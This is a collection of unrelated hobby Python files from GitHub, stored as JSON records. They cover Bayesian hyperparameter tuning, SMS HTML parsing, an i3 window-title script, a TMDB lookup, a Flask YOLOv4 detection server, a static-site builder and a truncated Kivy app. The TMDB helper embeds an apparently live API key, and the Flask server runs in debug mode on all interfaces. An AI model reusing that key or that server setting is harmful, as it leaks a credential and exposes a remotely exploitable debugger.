{"seq_id":"1360372180","text":"import numpy as np\nimport skopt\nfrom skopt import gp_minimize\nfrom sklearn.datasets import load_digits\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import train_test_split\nimport sys\nimport pandas as pd\nimport time\nimport datetime as dt\nfrom ParamTuning.ModelInterface import ModelInterface\n\n\n# ----------------------------------------------------\n# Simple skopt optimizer\n# ----------------------------------------------------\n# With this it is possible to run an optimization in \n# just a couple of commands.\n# ----------------------------------------------------\n# make_save: saves reusable results\n# make_log: saves human readable results\n# ----------------------------------------------------\n# old batch (boolean) is now mode, an integer with:\n# 0 --> monolithic optimization\n# 1 --> batch optimization\n# 2 --> nested cross validation\n# ----------------------------------------------------\nclass Optimizer(object):\n    def __init__(self, model_name,\n                 kind,\n                 mode=0,\n                 auto_save=True,  # Saves the results at the end of optimization\n                 make_save=True,  # Saves the results iteration per iteration\n                 make_log=True,  # Make a human readable log iteration per iteration\n                 path=None,  # Define path in which to save results of optimization\n                 path_log=None):  # Path in which to save logs\n\n        # Inputs\n        self.model_name = model_name\n        self.kind = kind\n        self.mode = mode\n        self.auto_save = auto_save  # saves the results without explicitly calling the method\n        self.make_save = make_save\n        self.make_log = make_log\n        self.path = path\n        self.path_log = path_log\n        # ModelInterface\n        self.MI = None\n        # Iteration counter\n        self.iter_count = 0\n        # Declaring result variable\n        self.result = None\n\n    # Setting the parameters of the optimizer\n    def setParameters(self,\n                      n_calls=20,\n                      n_points=10000,\n                      n_random_starts=10,\n                      n_jobs=1,\n                      # noise = 'gaussian',\n                      noise=1e-7,\n                      acq_func='gp_hedge',\n                      
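# 'gp_hedge' probabilistically chooses among the EI, PI and LCB acquisition functions\n                      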
acq_optimizer='auto',\n random_state=None,\n verbose=True,\n n_restarts_optimizer=5,\n xi=0.01,\n kappa=1.96,\n x0=None,\n y0=None):\n\n self.n_point = n_points\n self.n_calls = n_calls\n self.n_random_starts = n_random_starts\n self.n_jobs = n_jobs\n self.acq_func = acq_func\n self.acq_optimizer = acq_optimizer\n self.random_state = random_state\n self.n_restarts_optimizer = n_restarts_optimizer\n self.verbose = verbose\n self.xi = xi\n self.kappa = kappa\n self.noise = noise\n self.x0 = x0\n self.y0 = y0\n\n # Setting the model interface\n\n def defineMI(self, model_name=None, kind=None):\n if model_name is not None:\n self.model_name = model_name\n if kind is not None:\n self.kind = kind\n\n # Model interface\n self.MI = ModelInterface(model_name=self.model_name,\n kind=self.kind,\n mode=self.mode)\n\n # Defining the optimization method\n def optimize(self):\n\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n # Setting filename\n if self.path is None:\n self.path = str(dt.datetime.now().strftime(\"%m_%d_%H_%M_%S\"))\n\n # Checking if callback has to be called to make logs\n if (self.make_save is True):\n # Defining the callback function\n callback_function = self.callback_func\n else:\n callback_function = None\n\n # Making (or not) human readable logs\n self.MI.setSaveLog(self.make_log)\n\n # Path in which to save logs\n if self.path_log is not None:\n self.MI.setLogPath(self.path_log)\n\n self.result = gp_minimize(self.MI.getScoreFunc(),\n self.MI.getParams(),\n base_estimator=None,\n n_calls=self.n_calls,\n n_random_starts=self.n_random_starts,\n acq_func=self.acq_func,\n acq_optimizer=self.acq_optimizer,\n x0=self.x0,\n y0=self.y0,\n random_state=self.random_state,\n verbose=self.verbose,\n callback=callback_function,\n n_points=self.n_point,\n n_restarts_optimizer=self.n_restarts_optimizer,\n xi=self.xi,\n kappa=self.kappa,\n noise=self.noise,\n n_jobs=self.n_jobs)\n\n # Resetting the count for the logs\n self.MI.resetSaveLog()\n\n # Saving the obtained results\n if self.auto_save is True:\n self.saveRes(self.result)\n\n return self.result\n\n def callback_func(self, res):\n if self.make_save is True:\n self.saveRes(res)\n '''\n if self.make_log is True:\n self.saveLog(res)\n '''\n\n # Saving the results of the optimization with built-in method\n def saveRes(self, res):\n path = self.path + \".save.npz\"\n # The only way to save this shit\n np.savez(path, x0=res.x_iters, y0=res.func_vals)\n # skopt.dump(res, path, store_objective=False)\n # print(\"Results {0} successfully saved.\".format(path))\n\n '''\n #MOVED INTO MODEL INTERFACE CLASS\n #Method to save human readable logs\n def saveLog(self, res):\n #Parameters of the evaluation\n x = res.x_iters\n #Result of the evaluation\n y = res.func_vals\n #Taking the path provided\n path = self.path + \".log\"\n #Get hyperparameter names\n p_names = self.MI.getParamNames()\n #Maybe check len(p_names) == len(x) here\n\n #Opening a file and writing into it the logs\n with open(path, 'a') as log:\n to_write = \"ITERATION NUMBER \" + str(self.iter_count) + \"\\n\"\n log.write(to_write)\n for i in range(len(p_names)):\n to_write=str(str(p_names[i])+\": \"+str(x[self.iter_count][i])+\"\\n\")\n log.write(to_write)\n\n #Written this way to be easily found\n to_write=\"--outcome--: \"+str(y[self.iter_count])+\"\\n\\n\"\n log.write(to_write)\n\n #Increasing the iteration count\n self.iter_count = self.iter_count + 1\n '''\n\n # Loading model with built-in method (errors even with pickle)\n def 
loadModel(self, path=None):\n if (path is None):\n print(\"File path missing.\")\n else:\n\n # The only way to save this shit\n model = np.load(path)\n\n # Splitting the model\n self.x0 = model['x0']\n self.y0 = model['y0']\n print(model['x0'])\n print(model['y0'])\n print(\"File {0} loaded successfully.\".format(path))\n\n def loadModelHardCoded(self, path=None):\n # Splitting the model\n self.x0 = [\n 265,\n 46,\n 0.15898209867759425,\n 28,\n 0.4267309590102383,\n 0.7106015549429759,\n 0.446213857304653,\n 1.0,\n 0.6629430145505582,\n 0.6997710091846678,\n 0.7287763868516478,\n 22,\n 2309\n ]\n\n self.y0 = [-5.47228466301597]\n\n print(\"Loaded Hard Coded Model as Prior Knowledge\")\n\n # Load a custom dataset to train for the optimization\n def loadTrainData(self, X_train=None, Y_train=None, holder_train=None):\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n self.MI.loadTrainData(X_train, Y_train, holder_train)\n\n # Load a custom dataset to test for the optimization\n def loadValData(self, X_val=None, Y_val=None, holder_val=None):\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n self.MI.loadValData(X_val, Y_val, holder_val)\n\n # Load a custom dataset to test for the optimization\n def loadTestData(self, X_test=None, Y_test=None, holder_test=None):\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n self.MI.loadTestData(X_test, Y_test, holder_test)\n\n # ---------------------------------------------------------------\n # Batch train parameters\n # ---------------------------------------------------------------\n def batchTrain(self, tot_train_split, train_id):\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n self.MI.batchTrain(tot_train_split, train_id)\n\n def batchVal(self, val_id):\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n self.MI.batchVal(val_id)\n\n def batchTest(self, tot_test_split, test_id):\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n self.MI.batchTest(tot_test_split, test_id)\n\n def setLabels(self, x_label, y_label, es_ncv=False):\n # Initializing model interface if it's None\n if self.MI is None:\n self.defineMI()\n\n self.MI.setLabels(x_label, y_label, es_ncv)\n\n # ---------------------------------------------------------------\n\n # ---------------------------------------------------------------\n # Setting non tuned parameters for xgb\n # ---------------------------------------------------------------\n def setParamsXGB(self, verbosity=1,\n process_type=\"default\",\n tree_method=\"auto\",\n objective=\"binary:logistic\",\n num_parallel_tree=4,\n eval_metric=\"rmsle\",\n early_stopping_rounds=None):\n if self.MI is None:\n self.defineMI()\n\n self.MI.setParamsXGB(verbosity=verbosity,\n process_type=process_type,\n tree_method=tree_method,\n objective=objective,\n num_parallel_tree=num_parallel_tree,\n eval_metric=eval_metric,\n early_stopping_rounds=early_stopping_rounds)\n # --------------------------------------------------------------\n\n #---------------------------------------------------------------\n # Setting non tuned parameters for lgb\n #---------------------------------------------------------------\n def setParamsLGB(self, verbosity=1, \n process_type=\"default\", \n tree_method=\"auto\", \n #Not in tuning dict\n objective= 'binary',\n num_threads= 4,\n metric= ('cross_entropy','cross_entropy_lambda'),\n 
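# the remaining defaults mirror setParamsXGB's interface above\n                 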
num_parallel_tree=4, \n eval_metric=\"rmsle\", \n early_stopping_rounds=None,\n is_unbalance=False):\n if self.MI is None:\n self.defineMI()\n \n self.MI.setParamsLGB(verbosity=verbosity,\n process_type=process_type,\n tree_method=tree_method,\n objective=objective,\n num_parallel_tree=num_parallel_tree,\n eval_metric=eval_metric,\n early_stopping_rounds=early_stopping_rounds,\n is_unbalance=is_unbalance)\n #---------------------------------------------------------------\n\n #---------------------------------------------------------------\n # Setting non tuned parameters for cat\n #---------------------------------------------------------------\n def setParamsCAT(self, verbosity= 1,\n boosting_type= \"Plain\",\n model_shrink_mode= \"Constant\",\n leaf_estimation_method= \"Newton\",\n bootstrap_type= \"Bernoulli\",\n early_stopping_rounds= 5):\n if self.MI is None:\n self.defineMI()\n\n self.MI.setParamsCAT(verbosity= verbosity,\n boosting_type= boosting_type,\n model_shrink_mode= model_shrink_mode,\n leaf_estimation_method= leaf_estimation_method,\n bootstrap_type= bootstrap_type,\n early_stopping_rounds= early_stopping_rounds)\n #---------------------------------------------------------------\n\n\n def setCategoricalFeatures(self,categorical_features=None):\n if self.MI is None:\n self.defineMI()\n self.MI.setCategoricalFeatures(categorical_features)\n","repo_name":"MaurizioFD/recsys-challenge-2020-twitter","sub_path":"ParamTuning/Optimizer.py","file_name":"Optimizer.py","file_ext":"py","file_size_in_byte":13613,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"6"} +{"seq_id":"34419033073","text":"import BeautifulSoup\n\n#This shit was taken from the documentation.\ndef extractsms(htmlsms) :\n \"\"\"\n extractsms -- extract SMS messages from BeautifulSoup tree of Google Voice SMS HTML.\n\n Output is a list of dictionaries, one per message.\n \"\"\"\n msgitems = [] # accum message items here\n # Extract all conversations by searching for a DIV with an ID at top level.\n tree = BeautifulSoup.BeautifulSoup(htmlsms) # parse HTML into tree\n conversations = tree.findAll(\"div\",attrs={\"id\" : True},recursive=False)\n for conversation in conversations :\n # For each conversation, extract each row, which is one SMS message.\n rows = conversation.findAll(attrs={\"class\" : \"gc-message-sms-row\"})\n for row in rows : # for all rows\n # For each row, which is one message, extract all the fields.\n msgitem = {\"id\" : conversation[\"id\"]} # tag this message with conversation ID\n spans = row.findAll(\"span\",attrs={\"class\" : True}, recursive=False)\n for span in spans : # for all spans in row\n cl = span[\"class\"].replace('gc-message-sms-', '')\n msgitem[cl] = (\" \".join(span.findAll(text=True))).strip() # put text in dict\n msgitems.append(msgitem) # add msg dictionary to list\n return msgitems\n\ndef extractInput(htmlsms, number):\n messages = []\n for msg in extractsms(htmlsms):\n if number in msg[u'from']:\n messages.append(msg)\n #only interested in latest message.\n return messages[-1][u'text']\n\n\n\n\n#found this shit on stackoverflow\ndef stripHtmlTags(htmlTxt):\n if htmlTxt is None:\n return None\n else:\n return ''.join(BeautifulSoup.BeautifulSoup(htmlTxt).findAll(text=True))\n\ndef sizeof_fmt(num):\n for x in ['bytes','KB','MB','GB']:\n if num < 1024.0:\n return \"%3.1f%s\" % (num, x)\n num /= 1024.0\n return \"%3.1f%s\" % (num, 
'TB')\n","repo_name":"mrmoth/whattxt","sub_path":"modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"37999178241","text":"#!/usr/bin/env python\n\nimport i3ipc\nimport argparse\n\nparser = argparse.ArgumentParser(description='Print the active window\\'s title')\nparser.add_argument('-t', '--truncate', help='Truncate titles to a max length', type=int, default=None)\nparser.add_argument('-s', '--subscribe', help='Monitor the active window and print whenever it changes', action='store_true')\nargs = parser.parse_args()\n\ntruncate_to = None\nif args.truncate:\n truncate_to = max(1, args.truncate - 3)\n\ndef print_window_title(container):\n title = container.name\n if not title:\n print(\"\")\n return\n if args.truncate and len(title) > args.truncate:\n title = title[:truncate_to] + '...'\n print(title)\n\ndef on_window_focus(i3, e):\n print_window_title(e.container)\n\ni3 = i3ipc.Connection()\nprint_window_title(i3.get_tree().find_focused())\nif args.subscribe:\n i3.on(\"window::focus\", on_window_focus)\n i3.on(\"window::title\", on_window_focus)\n i3.main()\n","repo_name":"jtsymon/i3title","sub_path":"i3title.py","file_name":"i3title.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"31778165807","text":"\nimport requests\n# this python file can be imported and used whenever API call needs to be made\n#to retrieve movie from TMDB based on movie id\ndef get_movie_details(movie_id):\n apikey=\"?api_key=ddb1cae2b2c35f2ad7e50626679381e5\"\n main_api=\"https://api.themoviedb.org/3/movie/\"\n url=main_api+movie_id+apikey\n json_data=requests.get(url).json()\n return json_data\n\n","repo_name":"vishyarjun/movieTrailerWebsite","sub_path":"json_api.py","file_name":"json_api.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"38544446620","text":"import json \r\nfrom flask import jsonify\r\nimport tensorflow as tf\r\nphysical_devices = tf.config.experimental.list_physical_devices('GPU')\r\nif len(physical_devices) > 0:\r\n tf.config.experimental.set_memory_growth(physical_devices[0], True)\r\nfrom absl import app, flags, logging\r\nfrom absl.flags import FLAGS\r\nimport core.utils as utils\r\nfrom core.config import cfg\r\nfrom core.yolov4 import filter_boxes\r\nfrom tensorflow.python.saved_model import tag_constants\r\nfrom PIL import Image\r\nimport cv2\r\nimport numpy as np\r\nfrom tensorflow.compat.v1 import ConfigProto\r\nfrom tensorflow.compat.v1 import InteractiveSession\r\nimport time \r\nimport os\r\nfrom watchdog.observers import Observer\r\nfrom watchdog.events import FileSystemEventHandler\r\nimport matplotlib.pyplot as plt\r\nfrom flask import Flask\r\nfrom flask import render_template, request\r\nfrom werkzeug.utils import secure_filename\r\nimport base64\r\nimport io\r\napp = Flask(__name__)\r\n\r\nprint(\"Test started\")\r\nconfig = ConfigProto()\r\nconfig.gpu_options.allow_growth = True\r\nsession = InteractiveSession(config=config)\r\ninput_size = 416\r\nsaved_model_loaded = tf.saved_model.load('./checkpoints/yolov4-416', tags=[tag_constants.SERVING])\r\nprint(\"Model loaded\")\r\nmonitor_dir = r'C:/Yolo2Tensor/tensorflow-yolov4-tflite/data/images/test'\r\ncollageDirectory = r'C:/Yolo2Tensor/tensorflow-yolov4-tflite/collage'\r\nUPLOAD_FOLDER = 
'C:/Users/yunxing/Downloads/Telegram Desktop/YoloTensor2/Yolo2Tensor/tensorflow-yolov4-tflite/upload_folder/'\r\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\r\n\r\n@app.route('/upload', methods = ['POST', 'GET'])\r\ndef upload():\r\n    if request.method == 'POST':\r\n        print('post request received')\r\n        label = ''\r\n        file = request.json.get('photo')\r\n        # filename = secure_filename(file.filename)\r\n        # base_path = os.path.dirname(__file__)\r\n        # image_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\r\n        # file.save(image_path)\r\n        imgdata = base64.b64decode(file)\r\n        PILImage = Image.open(io.BytesIO(imgdata)).rotate(180)\r\n        #print(PILImage)\r\n        print(\"image received\")\r\n        label = run_model(PILImage)\r\n        return label\r\n    return render_template('index.html')\r\n    \r\n\r\ncount = 1\r\nimageList = []\r\n# loop through images in list and run Yolov4 model on each\r\ndef run_model(PILImage):\r\n    countFilesInCollage = len([name for name in os.listdir(collageDirectory) if os.path.isfile(os.path.join(collageDirectory, name))])\r\n    if countFilesInCollage == 0:\r\n        imageList.clear()\r\n    global count\r\n    # print(r'{}'.format(image_path))\r\n\r\n    # time.sleep(1)\r\n    # #original_image = plt.imread(r'{}'.format(image_path.replace('\\\\', '/')))\r\n    # original_image = cv2.imread(r'{}'.format(image_path.replace('\\\\', '/')))\r\n    # print(original_image)\r\n    # original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)\r\n\r\n\r\n\r\n    # PIL already yields RGB (matching the commented-out imread + COLOR_BGR2RGB path);\r\n    # cv2.IMREAD_COLOR is an imread flag, not a cvtColor conversion code, so no conversion is needed here\r\n    original_image = np.array(PILImage)\r\n    image_data = cv2.resize(original_image, (input_size, input_size))\r\n    image_data = image_data / 255.\r\n\r\n    images_data = []\r\n    for i in range(1):\r\n        images_data.append(image_data)\r\n    images_data = np.asarray(images_data).astype(np.float32)\r\n\r\n    infer = saved_model_loaded.signatures['serving_default']\r\n    batch_data = tf.constant(images_data)\r\n    pred_bbox = infer(batch_data)\r\n    for key, value in pred_bbox.items():\r\n        boxes = value[:, :, 0:4]\r\n        pred_conf = value[:, :, 4:]\r\n\r\n    boxes, scores, classes, valid_detections = tf.image.combined_non_max_suppression(\r\n        boxes=tf.reshape(boxes, (tf.shape(boxes)[0], -1, 1, 4)),\r\n        scores=tf.reshape(\r\n            pred_conf, (tf.shape(pred_conf)[0], -1, tf.shape(pred_conf)[-1])),\r\n        max_output_size_per_class=50,\r\n        max_total_size=50,\r\n        iou_threshold=0.45,\r\n        score_threshold=0.25\r\n    )\r\n\r\n    #Get scores & classes and sort them into finalDictionary (not ranked based on max yet)\r\n    scoreArray = (scores.numpy()).flat\r\n    classesArray = (classes.numpy()).flat\r\n    finalScoreArray = []\r\n    finalClassArray = []\r\n    finalDictionary = {}\r\n\r\n    listOfClasses = [\"A\", \"B\", \"Bullseye\", \"C\", \"D\", \"Down\", \"E\", \"F\", \"G\", \"H\", \"Left\", \"Right\", \"S\", \"Stop\",\r\n                     \"T\", \"U\", \"Up\", \"V\", \"W\", \"X\", \"Y\", \"Z\", \"eight\", \"five\", \"four\", \"nine\",\r\n                     \"one\", \"seven\", \"six\", \"three\", \"two\"]\r\n    \r\n    listOfIDs = [15, 16, 31, 17, 18, 2, 19, 20, 21, 22, 4, 3, 23, 5, 24, 25, 1, 26, 27, 28, 29, 30, 13, 10, 9, 14, 6, 12, 11, 8, 7]\r\n\r\n    listOfRequiredClasses = [\"Alphabet A\", \"Alphabet B\", \"Bullseye\", \"Alphabet C\", \"Alphabet D\", \"down arrow\", \"Alphabet E\", \"Alphabet F\", \"Alphabet G\", \"Alphabet H\", \"left arrow\", \"right arrow\", \"Alphabet S\", \"Stop\",\r\n                             \"Alphabet T\", \"Alphabet U\", \"Up arrow\", \"Alphabet v\", \"Alphabet w\", \"Alphabet x\", \"Alphabet y\", \"Alphabet z\", \"eight\", \"five\", \"four\", \"nine\",\r\n                             \"one\", \"seven\", \"six\", \"three\", \"two\"]\r\n    if scoreArray[0] 
> 0:\r\n\r\n for i in range(len(scoreArray)):\r\n if scoreArray[i] > 0.0:\r\n finalScoreArray.append(scoreArray[i])\r\n finalClassArray.append(classesArray[i])\r\n finalDictionary.update({listOfClasses[int(finalClassArray[i])]: str(scoreArray[i])})\r\n\r\n\r\n\r\n else:\r\n print(\"No Detections\")\r\n\r\n print(\"finalDictionary: \", finalDictionary)\r\n\r\n pred_bbox = [boxes.numpy(), scores.numpy(), classes.numpy(), valid_detections.numpy()]\r\n\r\n # read in all class names from config\r\n class_names = utils.read_class_names(cfg.YOLO.CLASSES)\r\n\r\n # by default allow all classes in .names file\r\n print(class_names)\r\n\r\n allowed_classes = list(class_names.values())\r\n\r\n print(allowed_classes)\r\n \r\n # custom allowed classes (uncomment line below to allow detections for only people)\r\n #allowed_classes = ['person']\r\n\r\n image = utils.draw_bbox(original_image, pred_bbox, allowed_classes = allowed_classes)\r\n\r\n image = Image.fromarray(image.astype(np.uint8))\r\n\r\n \r\n image.show()\r\n image = cv2.cvtColor(np.array(image), cv2.COLOR_BGR2RGB)\r\n\r\n imageList.append(image)\r\n imagecollage = cv2.hconcat(imageList)\r\n\r\n cv2.imwrite('./detections/' + 'detection' + str(count) + '.jpg', image)\r\n cv2.imwrite('./collage/' + 'detection' + str(count) + '.jpg', imagecollage)\r\n count += 1\r\n print(finalDictionary)\r\n return jsonify(finalDictionary)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True, host = '0.0.0.0')\r\n","repo_name":"simpleesamm/Yolov4_Tensorflow-Object_Detection","sub_path":"model_server_new.py","file_name":"model_server_new.py","file_ext":"py","file_size_in_byte":6572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35701525542","text":"#!/usr/bin/python3\n#builds a static version of site for deployment into /output\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\nfrom pathlib import Path\nfrom shutil import copytree,rmtree\nimport os\n\nfinal_templates = ['lander.html', '404.html', 'contact.html']\nstatic_dir = \"static\"\n\ndef make_output_dir(output_dir):\n Path(output_dir).mkdir(parents=True, exist_ok=True)\n\ndef generate_static(output_dir=\"./output\", static_prefix=\"/static/\"):\n\n if os.path.isdir(output_dir):\n print(\"Clearing output directory..\")\n rmtree(output_dir)\n\n env = Environment(\n loader=FileSystemLoader('templates'),\n autoescape=select_autoescape(['html', 'xml'])\n )\n\n make_output_dir(output_dir)\n\n for leaf in final_templates:\n leaf_template = env.get_template(\"directory/\"+leaf)\n leaf_html = leaf_template.render(foo='bar', STATIC_PREFIX=static_prefix)\n print(\"Writing {} to {}...\".format(leaf, output_dir+\"/\"+leaf))\n with open(output_dir+\"/\"+leaf, \"w+\") as f:\n f.write(leaf_html)\n\n print(\"Copying static files to {}\".format(output_dir))\n copytree(static_dir, output_dir+\"/\"+static_dir)\n\n print(\"Done! 
Static site ready in {}\".format(output_dir))\n\n\nif __name__ == '__main__':\n #For testing.\n #generate_static(static_prefix=\"./static/\")\n generate_static()\n","repo_name":"virtualsnow/txtsx-template","sub_path":"build-static.py","file_name":"build-static.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43627839144","text":"from kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.uix.recycleview import RecycleView\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.properties import BooleanProperty\nfrom kivy.properties import NumericProperty\nfrom kivy.uix.tabbedpanel import TabbedPanel\nfrom kivy.clock import Clock, mainthread\nfrom functools import partial\nimport json\nimport csv, datetime, decimal, math, re, os, time\nfrom kivy.uix.recycleview.layout import LayoutSelectionBehavior\n###Define Constants\ncc = ',';\ncnl = '\\n';\ndnl = '\\r\\n'\npi = math.pi;\nmi2km = 1.609344;\nmi2meter = 1609.344;\nkm2meter = 1000;\nfeet2meter = 0.3048\nGt = 1;\nGr = 1 # db gain of transmitter and receiver assume to 1 (no gain)\nalexp = 2.75 # effective exponent of distance due to environment; 2 for free space\nERk = 6371 # earth radius in km (6371) (or in miles (3963))\nER = 3963 # earth radius in km (6371) (or in miles (3963))\nDEC = ERk * pi / 180 # degree-earth-conversion factor: 111.1949266_km or 69.16739826_mile\nDRC = 180 / pi # degree-radian-conversion factor: 57.29577951\nrd = \"AM,FB,FL,FM,FX\" # radio service codes of radio broadcasters\ntv = \"CA,DC,DT,LD,TX\" # radio service codes of TV broadcasters\nbc = rd + ',' + tv # radio service codes of radio and TV broadcasters\nps = \"GE,GF,GP,IQ,MW,PA,PW,SG,SL,SP,SY,WP,YE,YF,YP,YW\" # RSC of public safety group\ngv = \"GV\" # US Government GMF\nSplittingCharacters = [' ', \"'\", '\"', 'n', 'N', 's', 'S', 'e', 'E', 'w', 'W']\nnumin = lambda sn: re.search('[\\d.-]+', sn)[0] if re.search('\\d', sn)[0] else 0\ndmsd2dd = lambda dmsd: (abs(dmsd[0]) + dmsd[1] / 60 + dmsd[2] / 3600) * dmsd[3]\ndata1 = data2 = data3 = data4 = data5 = data6 = data7 = data8 = data9 = data10 = ''\n\ndef dd2dmsd(dd, lcd):\n m, s = divmod(abs(dd) * 3600, 60)\n d, m = divmod(m, 60)\n if dd >= 0:\n cd = lcd[0]\n else:\n cd = lcd[1]\n if 'N' in lcd:\n sd, sm, ss = f'{d:02.0f}', f'{m:02.0f}', f'{s:05.2f}'\n else:\n sd, sm, ss = f'{d:03.0f}', f'{m:02.0f}', f'{s:05.2f}'\n return sd, sm, ss, cd\n\ndef fduration(duration):\n ssdur = str(datetime.timedelta(seconds=duration)).split(' ')\n d = f'{int(ssdur[0]):d}d' if len(ssdur) > 1 else ''\n lhms = ssdur[-1].split(':')\n H = int(lhms[0]);\n M = int(lhms[1]);\n S = int(float(lhms[2]))\n h = f'{H:d}h' if H > 0 else ''\n m = f'{M:d}m' if M > 0 else ''\n s = f'{S:d}s' if S > 0 else ''\n return d + h + m + s\n\n\nnumin = lambda sn: re.search('[\\d.-]+',sn)[0] if re.search('\\d',sn)[0] else 0\ntdata = [{'col1': 'Band Number', 'col2': 'BBF (Hz)', 'col3': 'BEF (Hz)', 'col4': 'SWD (s)', 'col5': 'SWP (0|#)', 'col6': 'RBW (Hz)', 'col7': 'Att (dB)', 'col8': 'Ref (dBm)'\n , 'col9': 'TRM', 'col10': 'Band Info'},\n {'col1': '1', 'col2': '0.521e6', 'col3': '1.709e6', 'col4': '0', 'col5': '0', 'col6': '3e2', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'radio AM'}, # 1\n {'col1': '2', 'col2': '87.8e6', 'col3': '108e6', 'col4': '0', 'col5': '0', 'col6': '1e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'radio FM'}, # 2\n {'col1': '3', 'col2': 
'162.375e6', 'col3': '162.575e6', 'col4': '0', 'col5': '0', 'col6': '1e2', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'NOAA NWR'}, # 3\n {'col1': '4', 'col2': '54e6', 'col3': '88e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'DTV VHF1'}, # 4\n {'col1': '5', 'col2': '174e6', 'col3': '216e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'DTV VHF1'}, # 5\n {'col1': '6', 'col2': '470e6', 'col3': '539e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'DTV VHF1'}, # 6\n {'col1': '7', 'col2': '539e6', 'col3': '608e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'DTV VHF1'}, # 7\n ]\n\nxdata = [{'col1': 'Band Number', 'col2': 'BBF (Hz)', 'col3': 'BEF (Hz)', 'col4': 'SWD (s)', 'col5': 'SWP (0|#)', 'col6': 'RBW (Hz)', 'col7': 'Att (dB)', 'col8': 'Ref (dBm)'\n , 'col9': 'TRM', 'col10': 'Band Info'},\n {'col1': '1', 'col2': '150e6', 'col3': '174e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'PS 150MHz'}, # 1\n {'col1': '2', 'col2': '450e6', 'col3': '512e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'PS 450MHz'}, # 2\n {'col1': '3', 'col2': '758e6', 'col3': '775e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'PS 760MHz'}, # 3\n {'col1': '4', 'col2': '851e6', 'col3': '862e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'PS 850MHz'}, # 4\n ]\n\nclass Tabelle(BoxLayout):\n pass\n\nclass Table(BoxLayout):\n\n try:\n rcsinputs = open(\"rcsinputs.txt\", 'w')\n rcsinputs.write(data1 + ' ' + data2 + ' '+ data3 + ' ' + data4 + ' ' + data5 + ' ' + data6 + ' ' + data7 + ' ' + data8 + ' ' + data9 + ' ' + data10)\n rcsinputs.close()\n except (RuntimeError, ValueError, TypeError, UnboundLocalError):\n content=Label(text=\"Get rcsbands.txt first.\" + \"\\n\" + \"Touch outside to dismiss.\", halign='center', valign='middle')\n popup = Popup(title=\"Save Error\", content=content, size_hint=(.6, .6)).open()\n\n\nclass VVScreen(Screen):\n def save(self):\n data = json.dumps(xdata)\n with open('example.json', 'w') as json_file:\n json.dump(data, json_file)\n\n\nclass RVScreen(Screen):\n\n def save(self):\n data = json.dumps(tdata)\n with open('example.json', 'w') as json_file:\n json.dump(data, json_file)\n\n\n\n\n\n\nclass CustomScreen(Screen):\n pass\n\nclass FirstScreen(Screen):\n def validate_input(self, sinput):\n try:\n sinput, sid = sinput.split('|||')\n sinput = sinput.strip()\n ltsin = len(sinput)\n self.ids[sid].text = sinput\n print(sinput)\n Clock.schedule_once(partial(self._refocus_textinput, sid, ltsin))\n except (RuntimeError, ValueError, TypeError):\n content = Label(text=\"Check the input is entered.\" + \"\\n\" + \"Touch outside to dismiss.\", halign='center',\n valign='middle')\n popup = Popup(title=\"Radius Error\", content=content, size_hint=(.6, .6)).open()\n\n def _refocus_textinput(self, *args):\n self.ids[args[0]].cursor = (args[1], 0)\n self.ids[args[0]].get_focus_next().focus = True\n\n def format_radius(self, sinradius): # convert input-radius to km; validate on enter\n try:\n sid = 'radius_input'\n sinradius = (\n re.search('[ \\S]+:', sinradius)[0][:-1] if re.search('[ \\S]+:', sinradius) else sinradius).strip()\n ltsin = 
